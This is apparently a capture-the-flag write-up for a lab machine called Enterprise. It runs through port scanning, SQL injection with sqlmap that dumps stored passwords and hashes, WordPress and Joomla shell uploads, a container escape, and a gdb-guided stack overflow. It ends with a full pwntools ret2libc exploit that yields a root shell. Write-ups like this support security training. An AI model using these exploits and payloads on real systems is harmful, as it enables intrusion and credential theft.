Enterprise write-up by Alamot

Enumeration

Port scanning

We scan the full range of TCP ports using masscan:

$ sudo masscan -e tun0 -p0-65535 --max-rate 500 10.10.10.61

Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2018-03-15 09:28:39 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65536 ports/host]
Discovered open port 8080/tcp on 10.10.10.61                                   
Discovered open port 443/tcp on 10.10.10.61                                    
Discovered open port 80/tcp on 10.10.10.61                                     
Discovered open port 22/tcp on 10.10.10.61                                     
Discovered open port 32812/tcp on 10.10.10.61                                  
rate:  0.00-kpps, 100.00% done, waiting 0-secs, found=5

We found TCP ports 22, 80, 443, 8080 and 32812 open. Let’s explore them using nmap:

$ sudo nmap -A -p22,80,443,8080,32812 10.10.10.61

Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-15 11:33 EET
Nmap scan report for 10.10.10.61
Host is up (0.10s latency).

PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      (protocol 2.0)
| fingerprint-strings: 
|   NULL: 
|_    SSH-2.0-OpenSSH_7.4p1 Ubuntu-10
| ssh-hostkey: 
|   2048 c4:e9:8c:c5:b5:52:23:f4:b8:ce:d1:96:4a:c0:fa:ac (RSA)
|   256 f3:9a:85:58:aa:d9:81:38:2d:ea:15:18:f7:8e:dd:42 (ECDSA)
|_  256 de:bf:11:6d:c0:27:e3:fc:1b:34:c0:4f:4f:6c:76:8b (EdDSA)
80/tcp    open  http     Apache httpd 2.4.10 ((Debian))
|_http-generator: WordPress 4.8.1
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: USS Enterprise – Ships Log
443/tcp   open  ssl/http Apache httpd 2.4.25 ((Ubuntu))
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=enterprise.local/organizationName=USS Enterprise/stateOrProvinceName=United Federation of Planets/countryName=UK
| Not valid before: 2017-08-25T10:35:14
|_Not valid after:  2017-09-24T10:35:14
|_ssl-date: TLS randomness does not represent time
8080/tcp  open  http     Apache httpd 2.4.10 ((Debian))
|_http-generator: Joomla! - Open Source Content Management
|_http-open-proxy: Proxy might be redirecting requests
| http-robots.txt: 15 disallowed entries 
| /joomla/administrator/ /administrator/ /bin/ /cache/ 
| /cli/ /components/ /includes/ /installation/ /language/ 
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Home
32812/tcp open  unknown
| fingerprint-strings: 
|   GenericLines, GetRequest, HTTPOptions: 
|     _______ _______ ______ _______
|     |_____| |_____/ |______
|     |_____ |_____ | | | _ ______|
|     Welcome to the Library Computer Access and Retrieval System
|     Enter Bridge Access Code: 
|     Invalid Code
|     Terminating Console
|   NULL: 
|     _______ _______ ______ _______
|     |_____| |_____/ |______
|     |_____ |_____ | | | _ ______|
|     Welcome to the Library Computer Access and Retrieval System
|_    Enter Bridge Access Code:
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port22-TCP:V=7.60%I=7%D=3/15%Time=5AAA3DEE%P=x86_64-pc-linux-gnu%r(NULL
SF:,20,"SSH-2\.0-OpenSSH_7\.4p1\x20Ubuntu-10\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port32812-TCP:V=7.60%I=7%D=3/15%Time=5AAA3DEE%P=x86_64-pc-linux-gnu%r(N
SF:ULL,ED,"\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20_______\x20_______\x20\x20______\x20_______\n\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\|\x20\x20\x20\x20\x20\x20\|\x20\x20\x20\x20\x20\x
SF:20\x20\|_____\|\x20\|_____/\x20\|______\n\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\|_____\x20\|_____\x20\x20\|\x20\x20\x20\x20\x20\|\x20\|\x20\
SF:x20\x20\x20\\_\x20______\|\n\nWelcome\x20to\x20the\x20Library\x20Comput
SF:er\x20Access\x20and\x20Retrieval\x20System\n\nEnter\x20Bridge\x20Access
SF:\x20Code:\x20\n")%r(GenericLines,110,"\n\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20_______\x20_______\x20\x20______\x
SF:20_______\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\|\x20\x20\x20\x20\x
SF:20\x20\|\x20\x20\x20\x20\x20\x20\x20\|_____\|\x20\|_____/\x20\|______\n
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\|_____\x20\|_____\x20\x20\|\x2
SF:0\x20\x20\x20\x20\|\x20\|\x20\x20\x20\x20\\_\x20______\|\n\nWelcome\x20
SF:to\x20the\x20Library\x20Computer\x20Access\x20and\x20Retrieval\x20Syste
SF:m\n\nEnter\x20Bridge\x20Access\x20Code:\x20\n\nInvalid\x20Code\nTermina
SF:ting\x20Console\n\n")%r(GetRequest,110,"\n\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_______\x20_______\x20\x20______
SF:\x20_______\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\|\x20\x20\x20\x20
SF:\x20\x20\|\x20\x20\x20\x20\x20\x20\x20\|_____\|\x20\|_____/\x20\|______
SF:\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\|_____\x20\|_____\x20\x20\|\
SF:x20\x20\x20\x20\x20\|\x20\|\x20\x20\x20\x20\\_\x20______\|\n\nWelcome\x
SF:20to\x20the\x20Library\x20Computer\x20Access\x20and\x20Retrieval\x20Sys
SF:tem\n\nEnter\x20Bridge\x20Access\x20Code:\x20\n\nInvalid\x20Code\nTermi
SF:nating\x20Console\n\n")%r(HTTPOptions,110,"\n\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_______\x20_______\x20\x20___
SF:___\x20_______\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\|\x20\x20\x20\
SF:x20\x20\x20\|\x20\x20\x20\x20\x20\x20\x20\|_____\|\x20\|_____/\x20\|___
SF:___\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\|_____\x20\|_____\x20\x20
SF:\|\x20\x20\x20\x20\x20\|\x20\|\x20\x20\x20\x20\\_\x20______\|\n\nWelcom
SF:e\x20to\x20the\x20Library\x20Computer\x20Access\x20and\x20Retrieval\x20
SF:System\n\nEnter\x20Bridge\x20Access\x20Code:\x20\n\nInvalid\x20Code\nTe
SF:rminating\x20Console\n\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.12 (95%), Linux 3.13 (95%), Linux 3.16 (95%), Linux 3.18 (95%), Linux 3.2 - 4.8 (95%), Linux 3.8 - 3.11 (95%), Linux 4.2 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%)

Brute forcing directories and files

Port 80

$ dirb http://10.10.10.61/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Mar 15 13:28:08 2018
URL_BASE: http://10.10.10.61/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.10.61/ ----
+ http://10.10.10.61/index.php (CODE:301|SIZE:0)                                                                   
+ http://10.10.10.61/server-status (CODE:403|SIZE:299)                                                             
==> DIRECTORY: http://10.10.10.61/wp-admin/                                                                        
==> DIRECTORY: http://10.10.10.61/wp-content/                                                                      
==> DIRECTORY: http://10.10.10.61/wp-includes/                                                                     
+ http://10.10.10.61/xmlrpc.php (CODE:405|SIZE:42)                                                                 
                                                                                                                   
---- Entering directory: http://10.10.10.61/wp-admin/ ----
+ http://10.10.10.61/wp-admin/admin.php (CODE:302|SIZE:0)                                                          
==> DIRECTORY: http://10.10.10.61/wp-admin/css/                                                                    
==> DIRECTORY: http://10.10.10.61/wp-admin/images/                                                                 
==> DIRECTORY: http://10.10.10.61/wp-admin/includes/                                                               
+ http://10.10.10.61/wp-admin/index.php (CODE:302|SIZE:0)                                                          
==> DIRECTORY: http://10.10.10.61/wp-admin/js/                                                                     
==> DIRECTORY: http://10.10.10.61/wp-admin/maint/                                                                  
==> DIRECTORY: http://10.10.10.61/wp-admin/network/                                                                
==> DIRECTORY: http://10.10.10.61/wp-admin/user/                                                                   
                                                                                                                   
---- Entering directory: http://10.10.10.61/wp-content/ ----
+ http://10.10.10.61/wp-content/index.php (CODE:200|SIZE:0)                                                        
==> DIRECTORY: http://10.10.10.61/wp-content/languages/                                                            
==> DIRECTORY: http://10.10.10.61/wp-content/plugins/                                                              
==> DIRECTORY: http://10.10.10.61/wp-content/themes/                                                               
==> DIRECTORY: http://10.10.10.61/wp-content/upgrade/                                                              
==> DIRECTORY: http://10.10.10.61/wp-content/uploads/                                                              
                                                                                                                   
---- Entering directory: http://10.10.10.61/wp-includes/ ----
==> DIRECTORY: http://10.10.10.61/wp-includes/certificates/                                                        
==> DIRECTORY: http://10.10.10.61/wp-includes/css/                                                                 
==> DIRECTORY: http://10.10.10.61/wp-includes/customize/                                                           
==> DIRECTORY: http://10.10.10.61/wp-includes/fonts/                                                               
==> DIRECTORY: http://10.10.10.61/wp-includes/images/                                                              

Port 443

$ dirb https://10.10.10.61/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Mar 15 12:13:24 2018
URL_BASE: https://10.10.10.61/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: https://10.10.10.61/ ----
==> DIRECTORY: https://10.10.10.61/files/                                                                          
+ https://10.10.10.61/index.html (CODE:200|SIZE:10918)                                                             
+ https://10.10.10.61/server-status (CODE:403|SIZE:300)                                                            
                                                                                                                   
---- Entering directory: https://10.10.10.61/files/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)

Port 8080

$ dirb http://10.10.10.61:8080/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Mar 15 16:19:44 2018
URL_BASE: http://10.10.10.61:8080/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.10.61:8080/ ----
+ http://10.10.10.61:8080/0 (CODE:200|SIZE:7678)                                                                   
+ http://10.10.10.61:8080/01 (CODE:200|SIZE:8286)                                                                  
+ http://10.10.10.61:8080/02 (CODE:200|SIZE:8595)                                                                  
+ http://10.10.10.61:8080/1 (CODE:200|SIZE:8285)                                                                   
+ http://10.10.10.61:8080/1x1 (CODE:200|SIZE:8287)                                                                 
+ http://10.10.10.61:8080/2 (CODE:200|SIZE:8594)                                                                   
+ http://10.10.10.61:8080/2g (CODE:200|SIZE:8595)                                                                  
+ http://10.10.10.61:8080/about (CODE:200|SIZE:8160)                                                               
+ http://10.10.10.61:8080/About (CODE:200|SIZE:8160)                                                               

If we visit https://10.10.10.61/files/ we discover an archive lcars.zip which contains 3 files:

501 Oct 17 04:25 lcars_db.php
624 Oct 17 04:32 lcars_dbpost.php
377 Oct 17 07:53 lcars.php

If we look inside lcars.php we see some info:

...
Plugin Name: lcars
...

So, maybe there is installed a wordpress plugin named lcars… Interesting. Let’s have a look inside lcars_db.php:

<?php
include "/var/www/html/wp-config.php";
$db = new mysqli(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME);
// Test the connection:
if (mysqli_connect_errno()){
    // Connection Error
    exit("Couldn't connect to the database: ".mysqli_connect_error());
}


// test to retireve an ID
if (isset($_GET['query'])){
    $query = $_GET['query'];
    $sql = "SELECT ID FROM wp_posts WHERE post_name = $query";
    $result = $db->query($sql);
    echo $result;
} else {
    echo "Failed to read query";
}


?> 

Nice. I think this code begs for an SQL injection…

SQL Injection

Let’s use sqlmap to exploit this SQLI:

$ sqlmap -u "http://10.10.10.61/wp-content/plugins/lcars/lcars_db.php?query=22" --dbms=mysql

sqlmap identified the following injection point(s) with a total of 40 HTTP(s) requests:
---
Parameter: query (GET)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: query=(SELECT (CASE WHEN (3344=3344) THEN 3344 ELSE 3344*(SELECT 3344 FROM INFORMATION_SCHEMA.PLUGINS) END))

    Type: error-based
    Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
    Payload: query=(SELECT 3017 FROM(SELECT COUNT(*),CONCAT(0x716b6a7871,(SELECT (ELT(3017=3017,1))),0x716b717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
---

Let’s see what databases we have:

$ sqlmap -u "http://10.10.10.61/wp-content/plugins/lcars/lcars_db.php?query=22" --dbms=mysql --dbs

web server operating system: Linux Debian 8.0 (jessie)
web application technology: PHP 5.6.31, Apache 2.4.10
back-end DBMS: MySQL >= 5.0.0
available databases [8]:
[*] information_schema
[*] joomla
[*] joomladb
[*] mysql
[*] performance_schema
[*] sys
[*] wordpress
[*] wordpressdb

Let’s dump the wordpress database:

$ sqlmap -u "http://10.10.10.61/wp-content/plugins/lcars/lcars_db.php?query=22" --dbms=mysql -D wordpress --dump

...
wp_posts
--------
ID,guid,pinged,to_ping,post_date,post_type,post_name,menu_order,post_title,post_status,post_parent,ping_status,post_author,post_content,post_excerpt,post_date_gmt,post_modified,comment_count,post_password,post_mime_type,comment_status,post_modified_gmt,post_content_filtered
6,http://10.10.10.61/?p=66,<blank>,<blank>,2017-09-06 15:40:30,post,<blank>,0,Passwords,draft,0,open,1,Needed somewhere to put some passwords quickly\r\n\r\nZxJyhGem4k338S2Y\r\n\r\nenterprisencc170\r\n\r\nZD3YxfnSjezg67JZ\r\n\r\nu*Z14ru0p#ttj83zS6\r\n\r\n \r\n\r\n ,<blank>,0000-00-00 00:00:00,2017-09-06 15:40:30,0,<blank>,<blank>,open,2017-09-06 14:40:30,<blank>
67,http://10.10.10.61/?p=67,<blank>,<blank>,2017-09-06 
...

Nice, we have found some passwords: Passwords: ZxJyhGem4k338S2Y, enterprisencc170, ZD3YxfnSjezg67JZ, u*Z14ru0p#ttj83zS6. But we lack a username. Let’s use wpscan to enumerate users:

$ wpscan --url http://10.10.10.61/wp-content -e u

...

[i] User(s) Identified:

[+] william.riker
 | Detected By: Author Posts - Display Name (Passive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] william-riker
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)

...

If we do some tests, we will see that the credentials william.riker:u*Z14ru0p#ttj83zS6 are working for http://10.10.10.61/wp-login.php

Now let’s dump the joomladb database:


$ sqlmap -u "http://10.10.10.61/wp-content/plugins/lcars/lcars_db.php?query=22" --dbms=mysql -D joomladb --dump

edz2g_users
-----------
id,name,otep,email,block,otpKey,params,username,password,sendEmail,activation,resetCount,registerDate,requireReset,lastResetTime,lastvisitDate
400,Super User,<blank>,geordi.la.forge@10.10.10.61,0,<blank>,"{""admin_style"":"""",""admin_language"":"""",""language"":"""",""editor"":"""",""helpsite"":"""",""timezone"":""""}",geordi.la.forge,$2y$10$cXSgEkNQGBBUneDKXq9gU.8RAf37GyN7JIrPE7us9UBMR9uDDKaWy,1,0,0,2017-09-03 19:30:04,0,0000-00-00 00:00:00,2017-10-30 13:59:06
401,Guinan,<blank>,guinan@10.10.10.61,0,<blank>,"{""admin_style"":"""",""admin_language"":"""",""language"":"""",""editor"":"""",""helpsite"":"""",""timezone"":""""}",Guinan,$2y$10$90gyQVv7oL6CCN8lF/0LYulrjKRExceg2i0147/Ewpb6tBzHaqL2q,0,<blank>,0,2017-09-06 12:38:03,0,0000-00-00 00:00:00,0000-00-00 00:00:00

Nice, we have found the credentials geordi.la.forge:ZD3YxfnSjezg67JZ for http://10.10.10.61:8080/administrator

Getting shells

Getting shell on Wordpress container

We can get a shell on the wordpress container by editing or uploading plugins. You can do it via the web portal or metasploit etc:

msf exploit(handler) > use  exploit/unix/webapp/wp_admin_shell_upload 
msf exploit(wp_admin_shell_upload) > info

Basic options:
  Name       Current Setting     Required  Description
  ----       ---------------     --------  -----------
  PASSWORD   u*Z14ru0p#ttj83zS6  yes       The WordPress password to authenticate with
  Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST      10.10.10.61         yes       The target address
  RPORT      80                  yes       The target port (TCP)
  SSL        false               no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                   yes       The base path to the wordpress application
  USERNAME   william.riker       yes       The WordPress username to authenticate with
  VHOST                          no        HTTP server virtual host

Getting shell on Joomla container

We can get a shell on the Joomla container by editing the index.php of a template:
Then just visit the url of that template: http://10.10.10.61:8080/templates/beez3

Escaping from Joomla container

We have a common shared folder /var/www/html/files/ between the Joomla container and the host on port 403. Therefore, if we upload our shell to /var/www/html/files/shell.php and then visit https://10.10.10.61/files/shell.php we can escape the Joomla container.

Getting root

Port 32812 gave some interesting output on nmap scanning. Let’s use nc to check it:

$ nc 10.10.10.61 32812
nc: using stream socket

                 _______ _______  ______ _______
          |      |       |_____| |_____/ |______
          |_____ |_____  |     | |    \_ ______|

Welcome to the Library Computer Access and Retrieval System

Enter Bridge Access Code: 

Unfortunately we don’t know the code. But now we have a shell. Let’s see what is binding on port 32812

$ netstat -lntup | grep 32812
tcp        0      0 0.0.0.0:32812           0.0.0.0:*               LISTEN      1471/xinetd

The xinetd daemon listens for incoming requests over a network and launches the appropriate service. Let’s find what that service is:

$ pstree
systemd-+-VGAuthService
        |-accounts-daemon-+-{gdbus}
        |                 `-{gmain}
        |-acpid
        |-agetty
        |-apache2---15*[apache2]
        |-atd
        |-cron
        |-dbus-daemon
        |-dockerd-+-docker-containe-+-docker-containe-+-mysqld---37*[{mysqld}]
        |         |                 |                 `-9*[{docker-containe}]
        |         |                 |-docker-containe-+-apache2---10*[apache2]
        |         |                 |                 `-8*[{docker-containe}]
        |         |                 |-docker-containe-+-apache2-+-2*[apache2---sh---php---sh---sh---msf.bin---{msf.bin/eio}]
        |         |                 |                 |         `-10*[apache2]
        |         |                 |                 `-9*[{docker-containe}]
        |         |                 `-13*[{docker-containe}]
        |         |-docker-proxy---4*[{docker-proxy}]
        |         |-docker-proxy---3*[{docker-proxy}]
        |         `-16*[{dockerd}]
        |-irqbalance
        |-2*[iscsid]
        |-lvmetad
        |-lxcfs---2*[{lxcfs}]
        |-polkitd-+-{gdbus}
        |         `-{gmain}
        |-rsyslogd-+-{in:imklog}
        |          |-{in:imuxsock}
        |          `-{rs:main Q:Reg}
        |-snapd---7*[{snapd}]
        |-sshd
        |-systemd---(sd-pam)
        |-systemd-journal
        |-systemd-logind
        |-systemd-resolve
        |-systemd-timesyn---{sd-resolve}
        |-systemd-udevd
        |-vmtoolsd---{gmain}
        `-xinetd---lcars

Well, the service is named “lcars”:

$ which lcars
/bin/lcars

Using ltrace we discover the access code for lcars:

$ ltrace /bin/lcars
...
strcmp("somedummyinput\n", "picarda1")                    = -1
...

If we explore a little the lcars app, we discover that there is a segmentation fault / buffer overflow:

Enter Bridge Access Code:
picarda1

Welcome to the Library Computer Access and Retrieval System

LCARS Bridge Secondary Controls -- Main Menu: 

1. Navigation
2. Ships Log
3. Science
4. Security
5. StellaCartography
6. Engineering
7. Exit
Waiting for input: 
4
Disable Security Force Fields
Enter Security Override:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault

Let’s find more about this using gdb:

$ gdb /bin/lcars

(gdb) $ info functions
All defined functions:

Non-debugging symbols:
0x00000508  _init
0x00000540  strcmp@plt
0x00000550  setresuid@plt
0x00000560  printf@plt
0x00000570  fflush@plt
0x00000580  fgets@plt
0x00000590  puts@plt
0x000005a0  exit@plt
0x000005b0  __libc_start_main@plt
0x000005c0  __isoc99_scanf@plt
0x000005e0  _start
0x00000620  __x86.get_pc_thunk.bx
0x00000630  deregister_tm_clones
0x00000670  register_tm_clones
0x000006c0  __do_global_dtors_aux
0x00000710  frame_dummy
0x0000074c  __x86.get_pc_thunk.dx
0x00000750  startScreen
0x000007d4  disableForcefields
0x0000085e  main_menu
0x00000b6a  unable
0x00000ba8  bridgeAuth
0x00000c91  main
0x00000d30  __libc_csu_init
0x00000d90  __libc_csu_fini
0x00000d94  _fini

Let’s have a look inside the function disableForcefields:

(gdb) $ set disassembly-flavor intel
(gdb) $ disass disableForcefields
Dump of assembler code for function disableForcefields:
   0x000007d4 <+0>:    push   ebp
   0x000007d5 <+1>:    mov    ebp,esp
   0x000007d7 <+3>:    push   ebx
   0x000007d8 <+4>:    sub    esp,0xd4
   0x000007de <+10>:    call   0x620 <__x86.get_pc_thunk.bx>
   0x000007e3 <+15>:    add    ebx,0x281d
   0x000007e9 <+21>:    call   0x750 <startScreen>
   0x000007ee <+26>:    sub    esp,0xc
   0x000007f1 <+29>:    lea    eax,[ebx-0x2173]
   0x000007f7 <+35>:    push   eax
   0x000007f8 <+36>:    call   0x590 <puts@plt>
   0x000007fd <+41>:    add    esp,0x10
   0x00000800 <+44>:    sub    esp,0xc
   0x00000803 <+47>:    lea    eax,[ebx-0x2155]
   0x00000809 <+53>:    push   eax
   0x0000080a <+54>:    call   0x590 <puts@plt>
   0x0000080f <+59>:    add    esp,0x10
   0x00000812 <+62>:    mov    eax,DWORD PTR [ebx-0x10]
   0x00000818 <+68>:    mov    eax,DWORD PTR [eax]
   0x0000081a <+70>:    sub    esp,0xc
   0x0000081d <+73>:    push   eax
   0x0000081e <+74>:    call   0x570 <fflush@plt>
   0x00000823 <+79>:    add    esp,0x10
   0x00000826 <+82>:    sub    esp,0x8
   0x00000829 <+85>:    lea    eax,[ebp-0xd0]
   0x0000082f <+91>:    push   eax
   0x00000830 <+92>:    lea    eax,[ebx-0x213c]
   0x00000836 <+98>:    push   eax
   0x00000837 <+99>:    call   0x5c0 <__isoc99_scanf@plt>
   0x0000083c <+104>:    add    esp,0x10
   0x0000083f <+107>:    sub    esp,0x8
   0x00000842 <+110>:    lea    eax,[ebp-0xd0]
   0x00000848 <+116>:    push   eax
   0x00000849 <+117>:    lea    eax,[ebx-0x2138]
   0x0000084f <+123>:    push   eax
   0x00000850 <+124>:    call   0x560 <printf@plt>
   0x00000855 <+129>:    add    esp,0x10
   0x00000858 <+132>:    nop
   0x00000859 <+133>:    mov    ebx,DWORD PTR [ebp-0x4]
   0x0000085c <+136>:    leave  
   0x0000085d <+137>:    ret    
End of assembler dump.

Let’s explain some things. In general, when we look at the disassembly code at the top of a function we’ll see something like this:

push   ebp                  //backup caller's ebp
mov    ebp,esp              //set callee's ebp to esp
sub    esp, <some number>   //stack space for local variables

The ebp register will point to the top of our stack for this frame, and esp will point to the next available byte on the stack (stacks typically grow downwards). Now, although we can try different string sizes to find out the correct size for our payload header, we can also try to calculate it. It is quite simple actually. We just find the difference between the numbers in commands that subtract from esp (sub esp, ) and those in commands that add to esp (add esp, ) till the call to __isoc99_scanf function.

...
0x000007d8 <+4>:    sub    $0xd4,%esp
...
0x000007ee <+26>:    sub    $0xc,%esp
...
0x000007fd <+41>:    add    $0x10,%esp
0x00000800 <+44>:    sub    $0xc,%esp
...
0x0000080f <+59>:    add    $0x10,%esp
...
0x0000081a <+70>:    sub    $0xc,%esp
...
0x00000823 <+79>:    add    $0x10,%esp
0x00000826 <+82>:    sub    $0x8,%esp
...

Therefore: 0xd4 + 0xc - 0x10 + 0xc - 0x10 + 0xc - 0x10 + 0x8 = 0xd0 = 208

In order to overwrite the return address (i.e. eip) with our payload, we have to add 4 to account for pushing caller’s ebp into the stack. So our payload header will be 208+4 = 212. If you don’t know what I am talking about read this: Classic Stack Based Buffer Overflow – sploitF-U-N

Now, let’s check if ASLR is enabled on the box:

$ cat /proc/sys/kernel/randomize_va_space
0

Nice, ASLR is disabled. Now let’s find some useful addresses for our ret2libc payload:

gdb /bin/lcars
(gdb) print &system
$1 = (<text variable, no debug info> *) 0xf7e4c060 <system>
(gdb) print &exit
$2 = (<text variable, no debug info> *) 0xf7e3faf0 <exit>

find &system,+9999999,"/bin/sh"  
0xf7f70a0f

If we try to use the address 0xf7f70a0f, it won’t work because it contains a newline ASCII code (0x0a). Depending on the context, the scanf() function either removes whitespace or stops reading after a whitespace.

Let’s search for plain ‘sh’:

(gdb) find &system,+9999999,"sh"       
0xf7f6ddd5
0xf7f6e7e1
0xf7f70a14
0xf7f72582

The address 0xf7f6ddd5 seems just fine.

Autopwn script

Here is an autopwn script I wrote:

#!/usr/bin/env python2
# Author: Alamot
import time
import struct
from pwn import *
from subprocess import call

DEBUG = False
RHOST = "10.10.10.61"
RPORT = 32812

if DEBUG:
    context.log_level = 'debug'
else:
    context.log_level = 'info'

def conv(num):
    return struct.pack("<I",num)

payload = "A" * 212
payload += conv(0xf7e4c060) # system()
payload += conv(0xf7e3faf0) # exit()
payload += conv(0xf7f6ddd5) # 'sh'

r = remote(RHOST, RPORT)
r.recvuntil("Enter Bridge Access Code: ")
r.sendline("picarda1")
r.recvuntil("Waiting for input: ")
r.sendline("4")
r.recvuntil("Enter Security Override:")
r.sendline(payload)
r.interactive()

That’s all folks! :slight_smile:

$ ./pwn_lcars.py 
[+] Opening connection to 10.10.10.61 on port 32812: Done
[*] Switching to interactive mode

$ whoami
root

great job !!!

Nice, thanks!